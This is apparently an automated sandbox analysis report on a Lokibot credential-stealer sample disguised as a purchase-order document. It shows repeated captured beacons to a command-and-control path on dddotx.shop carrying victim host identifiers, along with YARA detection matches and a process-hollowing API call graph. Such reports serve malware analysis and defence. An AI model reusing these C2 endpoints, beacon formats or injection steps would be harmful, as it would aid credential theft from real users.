              Sep 25, 2024 10:21:01.509562969 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:02.141016006 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:02 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKRZk6oGtDJ3r6yBekAvvzCWk16HaByFAzu%2B34ddDGG00WJYzLZGuBoFI15MddBealgyk9iGU%2BxHbSZRL0J8k1pNTYO%2Fl7Ie1Y0chp%2BhDzXudi0pwngadlF5gizOKg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89992eeffa19bb-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              127192.168.2.749832188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:02.525079012 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:02.530014992 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:03.199822903 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:03 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gx99izGIh%2FhPUSzQ%2Fjm5sfY78Uczy4Fz6Lf1JzgS%2BQac3yxT9%2FOGEOIyHNzpwNiD4JKyCwQny9KKaOXuGeX2qBeFPEcSvMXLDdPolbOB77E1inf5LPUPjYz4Gpgp9g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999354f96c466-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              128192.168.2.749833188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:03.366055012 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:03.370904922 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:04.014822960 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:03 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF2zcAi9NSmA7H3dAbBS6rU3%2BkgNWuFeoUW0k%2BWdj05gubJbynp1jf0jislSiM6aHZPw3pte2MIYWRVvmSEf7HZIYtbozA0pVOJduwF09%2FgLu4kzz9svG67tYfmolQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89993a8ff89e05-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              129192.168.2.749834188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:04.488882065 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:04.493818045 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:05.131498098 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:05 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sd027RfBO%2Bcqegf6S%2BUUDd3WfjlqnPGlWJqTSvrIgLryM73VDDSQQ5S%2BkfiCtolVtgTV7cNIe5JVTZESnvhSm%2BL75y6e9%2BnLgGczxDj0ZLUa6V0e2OfFnHTNBN6c7A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999418e6a443e-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              130192.168.2.749835188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:05.268106937 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:05.272945881 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:05.949707985 CEST597INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:05 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BwDBx0OK%2BRQJl9nrYcEhkc7BTzDUiSeiQN3VRYoAZK7uY3VGbOSOn2%2B%2FZWpu0rFDTBgYgxD32emXo6nTjV7hz5i1wnxjWYCV7PJEyMhydln1C0ly8Gpd3ePZ5bHFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999467c8a41e0-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              131192.168.2.749836188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:06.096287012 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:06.101213932 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:06.745244026 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:06 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDxjuXrvZUxpxuejXKzBOrxjdTX1QpUxXi6abbGz8YhcvWFocTa%2FgBNUKV5gcDTRix75MDTDD%2BY%2Bk5iXku76DeP0UGCp18kgGQmMFufdM5NQS8xT2xNX4EEiyo5ODQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89994b9c0e0f45-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              132192.168.2.749837188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:06.894697905 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:06.901424885 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:07.563296080 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:07 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4jcox0invbQ3ydcBcLmK7s%2FnQZpXOrimvFowBTIPwZO2tcOhf7m%2Bs6Q%2F9rbvWUWNjmrkJO%2BpLvXFNLUC9Rr5ZnX%2Fum4vQFgcZebIrZ52CnRqeF5BdR1T706%2BC8A3w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999509e1d7d00-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              133192.168.2.749838188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:07.851252079 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:07.859251022 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:08.545244932 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:08 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kDcElRujfFU27a2MSEyRLrCXsYnSVPMvJY%2BXltO4vZbvO7W%2Fw5HO%2FS%2FMqBmgEIRf2SJsyd1zQTe%2FMIys%2Bs6sLmEol3wBvcEryW9Tk16gBmb8LUaYGC0QKXnIa3PjsA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899956add0c413-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              134192.168.2.749839188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:09.936089039 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:09.943417072 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:10.666544914 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:10 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y53BXyOf9asEuqVE6J%2FMQ3XO%2FKsdUDDHI8UlJSP7cN1yjAbpntEtz1TSYTVoYxrtH2qJ1F751bdWCsXAGqclNloJ21BV683TVNkZNNEg2JBDnaJPWAx%2Bz8jANvN9nQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899963afd28c99-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              135192.168.2.749840188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:10.813240051 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:10.818080902 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:11.512902975 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:11 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qwXGPoU5sTtXbjCZkY8QdIYtL2TYr1Hb1pVF8qz0lRzW52Qfct0LvFZUxbdYYWfZ%2F3jltHllV9R%2F7QQajJZDUZ3ZmUPxIG%2FAXn8Q3IKuH8nrq6l49CEIpbO7tTEoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999692a387c96-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              136192.168.2.749841188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:11.669521093 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:11.674439907 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:12.356112957 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:12 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6MPIsfFruZUhXYken8dVVxkrQSldtml8W3lYv63eRu%2Bwzocz6AQ8xEHTpRnEskMtEYqnVrwDRqgcY7GopvuO%2Bnnkk8rhH1%2Bku3lxqENKGORfKdhi1EtJuhbYjZf9A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89996e6d718c8a-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination Port
              137192.168.2.749842188.114.97.380
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:12.566299915 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:12.571147919 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:13.248045921 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:13 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKihcROsUu%2FMWQYq23ZOZZHOwdkBYi2BW%2FeoduepUa05Ad68Xoaa8QYaqxouPQGRqSDt%2BlRUP1ApI5B183MAyxbNnRLYDyCVjLo9ZwsauJDMUMaPYTqMn8Z2If5ZPg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999740fe617d9-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:04:19:05
              Start date:25/09/2024
              Path:C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe"
              Imagebase:0xbd0000
              File size:208'896 bytes
              MD5 hash:AA2EDBA076823E2D67C52D3055A15E80
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:04:19:06
              Start date:25/09/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Imagebase:0x6e0000
              File size:56'368 bytes
              MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:moderate
              Has exited:false

              Reset < >

                Execution Graph

                Execution Coverage:27%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:35
                Total number of Limit Nodes:2
                execution_graph 2094 17454f7 2095 17454ff CreateProcessW 2094->2095 2097 17456f4 2095->2097 2097->2097 2066 1745500 2067 174558d CreateProcessW 2066->2067 2069 17456f4 2067->2069 2070 1745a60 VirtualAllocEx 2071 1745b17 2070->2071 2080 1745b60 2081 1745b67 WriteProcessMemory 2080->2081 2083 1745c48 2081->2083 2084 1745941 2085 1745947 ReadProcessMemory 2084->2085 2086 1745a07 2085->2086 2090 1745831 2091 1745837 Wow64SetThreadContext 2090->2091 2093 17458f4 2091->2093 2098 1745ca1 2099 1745ca7 ResumeThread 2098->2099 2100 1745d30 2099->2100 2062 1745838 2063 1745896 2062->2063 2064 17458ab Wow64SetThreadContext 2062->2064 2063->2064 2065 17458f4 2064->2065 2072 1745b68 2073 1745be6 WriteProcessMemory 2072->2073 2074 1745bd1 2072->2074 2075 1745c48 2073->2075 2074->2073 2076 1745948 ReadProcessMemory 2077 1745a07 2076->2077 2078 1745ca8 ResumeThread 2079 1745d30 2078->2079 2087 1745a58 2088 1745a5f VirtualAllocEx 2087->2088 2089 1745b17 2088->2089

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 39 17454f7-174558b 41 17455a2-17455b0 39->41 42 174558d-174559f 39->42 43 17455c7-1745603 41->43 44 17455b2-17455c4 41->44 42->41 45 1745605-1745614 43->45 46 1745617-17456f2 CreateProcessW 43->46 44->43 45->46 50 17456f4-17456fa 46->50 51 17456fb-17457c4 46->51 50->51 60 17457c6-17457ef 51->60 61 17457fa-1745805 51->61 60->61 65 1745806 61->65 65->65
                APIs
                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 017456DF
                Memory Dump Source
